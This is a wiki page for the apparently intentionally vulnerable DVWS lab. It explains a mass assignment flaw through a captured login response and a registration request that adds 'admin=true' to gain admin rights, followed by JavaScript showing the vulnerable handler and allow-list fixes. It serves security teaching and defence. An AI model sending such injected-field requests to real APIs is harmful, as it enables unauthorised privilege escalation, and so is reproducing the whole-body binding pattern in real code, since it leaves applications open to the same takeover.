
Mass Assignment

Sam Sanoop edited this page Jun 6, 2020 · 1 revision

Introduction

Many web frameworks let developers bind HTTP request parameters automatically into program variables or model objects, which saves boilerplate. When the set of bindable fields is not restricted, this convenience becomes a mass assignment vulnerability: an attacker who learns or guesses the name of an internal field can supply it in a request and overwrite variables or object properties that the developer never intended a client to set.

Details

It is common for APIs to bind user-supplied parameters straight into program variables without validating which parameters a client is allowed to set. Within DVWS, an admin area exists at http://dvws.local/admin.html which can only be accessed by a user with admin privileges.

Whether additional, hidden parameters exist on the user object can be discovered by studying the response to the /api/v2/login API request, which returns the full user record:

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: http://dvws.local
Vary: Origin
Access-Control-Allow-Credentials: true
Cache-Control: no-store, no-cache, must-revalidate, private
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiZm9vYmFyIiwicGVybWlzc2lvbnMiOlsidXNlcjpyZWFkIiwidXNlcjp3cml0ZSJdLCJpYXQiOjE1OTE0NDgzNzIsImV4cCI6MTU5MTYyMTE3MiwiaXNzIjoiaHR0cHM6Ly9naXRodWIuY29tL3Nub29weXNlY3VyaXR5In0.kNt8Ii58BflkixwYYnZaGEStbMCgB4g6rlbpuOTeJ2s
Content-Type: application/json; charset=utf-8
Content-Length: 445
ETag: W/"1bd-MTCFCIRckdyAF1fzVOMQ7O5tHg4"
Date: Sat, 06 Jun 2020 12:59:32 GMT
Connection: close

{"token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiZm9vYmFyIiwicGVybWlzc2lvbnMiOlsidXNlcjpyZWFkIiwidXNlcjp3cml0ZSJdLCJpYXQiOjE1OTE0NDgzNzIsImV4cCI6MTU5MTYyMTE3MiwiaXNzIjoiaHR0cHM6Ly9naXRodWIuY29tL3Nub29weXNlY3VyaXR5In0.kNt8Ii58BflkixwYYnZaGEStbMCgB4g6rlbpuOTeJ2s","status":200,"result":{"admin":false,"_id":"5edb9333d46c9612a137755c","username":"foobar","password":"$2b$10$b3dqx5BUMHcGUzdmaMFbmemSfOrtqECOErN66YXrV2nM1Re6yqddS","__v":0}}

The response shows that the user object carries an admin parameter, set to false for a normal account. DVWS binds the whole request body into the user model, so a mass assignment vulnerability exists: this parameter can be supplied during account creation to obtain admin privileges.

POST /api/v2/users HTTP/1.1
Host: dvws.local
Content-Length: 44
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4164.0 Safari/537.36 autochrome/red
Content-Type: application/x-www-form-urlencoded
Origin: http://dvws.local
Referer: http://dvws.local/
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close

username=foobar2&password=foobar2&admin=true

Logging in as foobar2 should now return "admin":true in the /api/v2/login response, and the admin area can be accessed.
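The following is an added example, not DVWS's own code, that models the handler shape behind the request above and its fix. DVWS is an Express application backed by a Mongoose-style user model (the `_id` and `__v` fields in the login response), so the example is in JavaScript; to stay runnable offline it replaces express and mongoose with a small schema/cast stand-in (`userSchema`, `buildUser`) and parses the form body with the built-in `URLSearchParams`. Field names match the login response; the password hashing seen there is deliberately left out.

```javascript
// Added example (not part of the DVWS project): a mass-assignable user-creation
// handler next to an allow-list fix. Everything below is a stand-in for
// express/mongoose so the block runs stand-alone under node.

// Schema inferred from the /api/v2/login response: username, password, and an
// admin flag that defaults to false.
const userSchema = {
  username: String,
  password: String,
  admin: { type: Boolean, default: false },
};

// Mimics Mongoose casting: a form value is always a string, and "true" is cast
// to the boolean true. This is exactly why `admin=true` in a URL-encoded body
// becomes `admin: true` on the stored document.
function castTo(type, value) {
  if (type === Boolean) {
    const s = String(value).toLowerCase();
    if (['true', '1', 'yes'].includes(s)) return true;
    if (['false', '0', 'no'].includes(s)) return false;
    throw new TypeError(`cannot cast ${JSON.stringify(value)} to Boolean`);
  }
  return String(value);
}

// Stand-in for `new User(doc)`: keeps schema fields, casts them, applies defaults.
function buildUser(doc) {
  const user = {};
  for (const [field, spec] of Object.entries(userSchema)) {
    const type = spec.type || spec;
    if (doc[field] !== undefined) {
      user[field] = castTo(type, doc[field]);
    } else if ('default' in spec) {
      user[field] = spec.default;
    }
  }
  return user;
}

// Parses an application/x-www-form-urlencoded body, as express.urlencoded would.
function parseForm(rawBody) {
  return Object.fromEntries(new URLSearchParams(rawBody));
}

// Vulnerable handler shape: the whole request body is bound into the model, so
// any schema field the client names (including admin) is accepted.
function createUserVulnerable(rawBody) {
  return buildUser(parseForm(rawBody));
}

// Fix 1: bind only an explicit allow-list of client-settable fields. Privileged
// fields such as admin can then only be set server-side.
const CLIENT_SETTABLE = ['username', 'password'];

function pick(obj, keys) {
  return Object.fromEntries(
    keys
      .filter((k) => Object.prototype.hasOwnProperty.call(obj, k))
      .map((k) => [k, obj[k]])
  );
}

function createUserSafe(rawBody) {
  return buildUser(pick(parseForm(rawBody), CLIENT_SETTABLE));
}

// Fix 2 (stricter): reject the request outright when it carries fields outside
// the allow-list, so tampering attempts surface as errors instead of being
// silently dropped.
function assertOnlyAllowed(body, allowed) {
  const extra = Object.keys(body).filter((k) => !allowed.includes(k));
  if (extra.length > 0) {
    throw new Error(`unexpected field(s): ${extra.join(', ')}`);
  }
}

function createUserStrict(rawBody) {
  const body = parseForm(rawBody);
  assertOnlyAllowed(body, CLIENT_SETTABLE);
  return buildUser(body);
}

// Replay of the request body from the page against both handler shapes.
const exploitBody = 'username=foobar2&password=foobar2&admin=true';
const results = {
  vulnerable: createUserVulnerable(exploitBody), // admin: true
  hardened: createUserSafe(exploitBody),         // admin: false
};
```

Of the two fixes, the allow-list alone is enough to close the hole; the strict variant is preferable on an API that should never receive unknown fields, because a logged rejection of `admin` is a useful signal that someone is probing the model.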

